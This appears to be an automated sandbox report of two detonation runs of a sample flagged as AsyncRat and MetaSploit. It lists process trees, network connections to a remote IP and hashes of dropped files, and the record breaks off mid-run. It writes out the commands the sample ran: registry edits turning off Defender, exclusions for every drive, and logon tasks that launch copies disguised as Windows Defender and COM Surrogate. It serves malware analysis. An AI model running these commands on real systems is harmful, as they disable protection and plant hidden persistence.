Reported
2024-06-19 22:16
Platform
win7-20240611-en
Max time kernel
143s
Max time network
149s
Command Line
Signatures
AsyncRat
MetaSploit
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Windows\system32\reg.exe | N/A |
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
Command and Scripting Interpreter: PowerShell
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\LOlC.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Runtime Broker.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\LOIC.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\COM Surrogate.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Windows Defender\Anti Malware Service.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\LOIC2.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Enumerates physical storage devices
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\LOIC.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\LOIC.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\LOIC2.exe
"C:\Users\Admin\AppData\Local\Temp\LOIC2.exe"
C:\Users\Admin\AppData\Local\LOlC.exe
"C:\Users\Admin\AppData\Local\LOlC.exe"
C:\Users\Admin\AppData\Local\Runtime Broker.exe
"C:\Users\Admin\AppData\Local\Runtime Broker.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c mkdir "C:\Users\Admin\AppData\Local\Windows Defender"
C:\Users\Admin\AppData\Local\LOIC.exe
"C:\Users\Admin\AppData\Local\LOIC.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c COPY "C:\Users\Admin\AppData\Local\LOlC.exe" "C:\Users\Admin\AppData\Local\Windows Defender\Windows Defender.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c SCHTASKS /CREATE /SC ONLOGON /TN "Windows Defender\Defender Scan" /TR "C:\Users\Admin\AppData\Local\Windows Defender\Windows Defender.exe" /F /RU "SYSTEM"
C:\Windows\system32\schtasks.exe
SCHTASKS /CREATE /SC ONLOGON /TN "Windows Defender\Defender Scan" /TR "C:\Users\Admin\AppData\Local\Windows Defender\Windows Defender.exe" /F /RU "SYSTEM"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg Add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 01 -f
C:\Windows\system32\reg.exe
reg Add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 01 -f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg Add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 -f
C:\Windows\system32\reg.exe
reg Add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 -f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "A:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "A:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "B:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "B:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "C:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "C:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "D:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "D:\\" -Force
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "COM Surrogate" /tr '"C:\Users\Admin\AppData\Roaming\COM Surrogate.exe"' & exit
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp1584.tmp.bat""
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "COM Surrogate" /tr '"C:\Users\Admin\AppData\Roaming\COM Surrogate.exe"'
C:\Windows\system32\timeout.exe
timeout 3
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "E:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "E:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "F:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "F:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "G:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "G:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "H:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "H:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "I:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "I:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "J:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "J:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "K:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "K:\\" -Force
C:\Users\Admin\AppData\Roaming\COM Surrogate.exe
"C:\Users\Admin\AppData\Roaming\COM Surrogate.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "L:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "L:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "M:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "M:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "N:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "N:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "O:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "O:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "P:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "P:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "Q:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "Q:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "R:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "R:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "S:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "S:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "T:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "T:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "U:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "U:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "V:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "V:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "W:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "W:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "X:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "X:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "Y:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "Y:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "Z:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "Z:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Windows Defender\Anti Malware Service.exe"
C:\Users\Admin\AppData\Local\Windows Defender\Anti Malware Service.exe
"C:\Users\Admin\AppData\Local\Windows Defender\Anti Malware Service.exe"
C:\Windows\system32\rundll32.exe
rundll32
Network
| Country | Destination | Domain | Proto |
| DE | 193.161.193.99:21265 | tcp | |
| DE | 193.161.193.99:52695 | tcp | |
| DE | 193.161.193.99:52695 | tcp | |
| DE | 193.161.193.99:52695 | tcp | |
| DE | 193.161.193.99:52695 | tcp | |
| DE | 193.161.193.99:52695 | tcp | |
| DE | 193.161.193.99:52695 | tcp | |
| DE | 193.161.193.99:21265 | tcp | |
| DE | 193.161.193.99:52695 | tcp | |
| DE | 193.161.193.99:52695 | tcp |
Files
memory/3056-0-0x000007FEF5653000-0x000007FEF5654000-memory.dmp
memory/3056-1-0x0000000000150000-0x000000000060E000-memory.dmp
\Users\Admin\AppData\Local\LOlC.exe
| MD5 | e6b7d05c7a4369dd9112959795bb3521 |
| SHA1 | 80c60595def3cbb2d126e3c86c9a1b92572b55b7 |
| SHA256 | 10eb620d956a63295cd933a3bad5769b1f8b0eec8b3748569467c82fb61e295c |
| SHA512 | baa982104c839f9f0893dc2940b418fc64fcc9e964a2791c176f7e7795ee7732429287d84f5d37bea15882a6462eaa7f7996bf283a27a0718ee96054a396a806 |
C:\Users\Admin\AppData\Local\Runtime Broker.exe
| MD5 | 9c3ad681c33d3fb6934102a35cb7a2ad |
| SHA1 | d3630943b6af7b956eb459fc2e8f5137f2f5f8a1 |
| SHA256 | 9625d7f8c8ddded4818a03ec7912c0df6ce464a95eb055b01a15fe3aa373305b |
| SHA512 | ea310b840455b8279c72ccb8e45f27b6ec861baf66d223b584d790bdca6426b54729eb7c80163c8e6ce1e88044088c1167109be0cb9418935d70ef42a6bbd466 |
memory/2912-14-0x0000000000F60000-0x0000000000F76000-memory.dmp
C:\Users\Admin\AppData\Local\LOIC.exe
| MD5 | e6fa3028cd03318496852718143d256f |
| SHA1 | 4c85973d612cd1955163c244c9c334d3a0c507cb |
| SHA256 | f60a52512773b52def9ba9ce8aad61144d2cf351f6bc04d1c5a13abef8f3b89b |
| SHA512 | 29089eccd1e670570fecafdd682f0ec13bc55fb17cdc0938ff4c6fd32c55c1919e26fad5b3ffed78217a94a9e8aba768cdf092ffc85f6ab19fbede0dc0fae0bb |
memory/2344-18-0x00000000000F0000-0x0000000000118000-memory.dmp
memory/2912-22-0x000007FEF5650000-0x000007FEF603C000-memory.dmp
memory/2852-27-0x000000001B5C0000-0x000000001B8A2000-memory.dmp
memory/2852-28-0x00000000027E0000-0x00000000027E8000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 270796220a5fa3608f1f2f8aced4deb2 |
| SHA1 | a4f6aea3b0578670f542a46147ae31b764ae0bbb |
| SHA256 | 5799972ecce88fa3d251b970c5f1379fde540323c0097bac9466ae3ca47993b7 |
| SHA512 | 32bb1776b58a1063210d8cd797449978f4253ffd285e31afc10d56f369cf9cd7c659ba6276d1f19765d0b95600c0d8b19a7e27c771c40ee8786e946e9743eb37 |
memory/2560-35-0x00000000020F0000-0x00000000020F8000-memory.dmp
memory/2560-34-0x000000001B670000-0x000000001B952000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tmp1584.tmp.bat
| MD5 | 90ff56b4b49a19829c55be4740d3d12f |
| SHA1 | f6680d7c2503c0601216a8f25b293748d50cbc70 |
| SHA256 | 87570ea322dea37a6701b524262a55f734114832f65278e44939aae2441a8acc |
| SHA512 | 916ee231cd3168b9d4e55cfecbd9cb10c4d9a5b0b99b194b0051dd3c0ca99841f455fb9ab55d05d4ccdb8677fdc86a9a977b72f2c237e511f6536f1313f810e7 |
memory/2912-54-0x000007FEF5650000-0x000007FEF603C000-memory.dmp
memory/908-94-0x00000000010C0000-0x00000000010D6000-memory.dmp
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Temp\Cab346B.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
memory/3036-172-0x000000013F8D0000-0x000000013FD57000-memory.dmp
C:\Users\Admin\AppData\Local\Windows Defender\Anti Malware Service.exe
| MD5 | 1837aea22a774bde2cd2eca02b5995a0 |
| SHA1 | c00b11f612716a5b9f282264538ddc2e041d8981 |
| SHA256 | 3263283f59723e5487b128439d495da10b06f84a84793da717a35e0dd7e3b905 |
| SHA512 | 9f479883cae36152dd2d2bf55e35d2ab05783e214479d12b957d316e4d3c16b63d9dfaf11f3752f9831c182f7c4b06261849042999bac4544fed4011c9fad67b |
memory/1540-193-0x0000000000060000-0x0000000000061000-memory.dmp
memory/1540-195-0x0000000000060000-0x0000000000061000-memory.dmp
memory/688-197-0x000000013F450000-0x000000013F53B000-memory.dmp
memory/908-217-0x0000000000560000-0x0000000000594000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Tar37A9.tmp
| MD5 | 4ea6026cf93ec6338144661bf1202cd1 |
| SHA1 | a1dec9044f750ad887935a01430bf49322fbdcb7 |
| SHA256 | 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8 |
| SHA512 | 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b |
Analysis: behavioral3
Detonation Overview
Submitted
2024-06-19 22:13
Reported
2024-06-19 22:16
Platform
win10v2004-20240508-en
Max time kernel
149s
Max time network
149s
Command Line
Signatures
AsyncRat
MetaSploit
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Windows\system32\reg.exe | N/A |
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\rundll32.exe | N/A |
Command and Scripting Interpreter: PowerShell
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\LOIC2.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Runtime Broker.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\LOlC.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Runtime Broker.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\LOIC.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\COM Surrogate.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Windows Defender\Anti Malware Service.exe | N/A |
Enumerates physical storage devices
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\LOIC.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\LOIC.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\LOIC2.exe
"C:\Users\Admin\AppData\Local\Temp\LOIC2.exe"
C:\Users\Admin\AppData\Local\LOlC.exe
"C:\Users\Admin\AppData\Local\LOlC.exe"
C:\Users\Admin\AppData\Local\Runtime Broker.exe
"C:\Users\Admin\AppData\Local\Runtime Broker.exe"
C:\Users\Admin\AppData\Local\LOIC.exe
"C:\Users\Admin\AppData\Local\LOIC.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c mkdir "C:\Users\Admin\AppData\Local\Windows Defender"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c COPY "C:\Users\Admin\AppData\Local\LOlC.exe" "C:\Users\Admin\AppData\Local\Windows Defender\Windows Defender.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c SCHTASKS /CREATE /SC ONLOGON /TN "Windows Defender\Defender Scan" /TR "C:\Users\Admin\AppData\Local\Windows Defender\Windows Defender.exe" /F /RU "SYSTEM"
C:\Windows\system32\schtasks.exe
SCHTASKS /CREATE /SC ONLOGON /TN "Windows Defender\Defender Scan" /TR "C:\Users\Admin\AppData\Local\Windows Defender\Windows Defender.exe" /F /RU "SYSTEM"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg Add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 01 -f
C:\Windows\system32\reg.exe
reg Add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 01 -f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg Add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 -f
C:\Windows\system32\reg.exe
reg Add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 -f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "A:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "A:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "B:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "B:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "C:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "C:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "D:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "D:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "E:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "E:\\" -Force
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "COM Surrogate" /tr '"C:\Users\Admin\AppData\Roaming\COM Surrogate.exe"' & exit
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp5FC3.tmp.bat""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "F:\\" -Force
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "COM Surrogate" /tr '"C:\Users\Admin\AppData\Roaming\COM Surrogate.exe"'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "F:\\" -Force
C:\Windows\system32\timeout.exe
timeout 3
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "G:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "G:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "H:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "H:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "I:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "I:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "J:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "J:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "K:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "K:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "L:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "L:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "M:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "M:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "N:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "N:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "O:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "O:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "P:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "P:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "Q:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "Q:\\" -Force
C:\Users\Admin\AppData\Roaming\COM Surrogate.exe
"C:\Users\Admin\AppData\Roaming\COM Surrogate.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "R:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "R:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "S:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "S:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "T:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "T:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "U:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "U:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "V:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "V:\\" -Force
C:\Windows\system32\cmd.exe
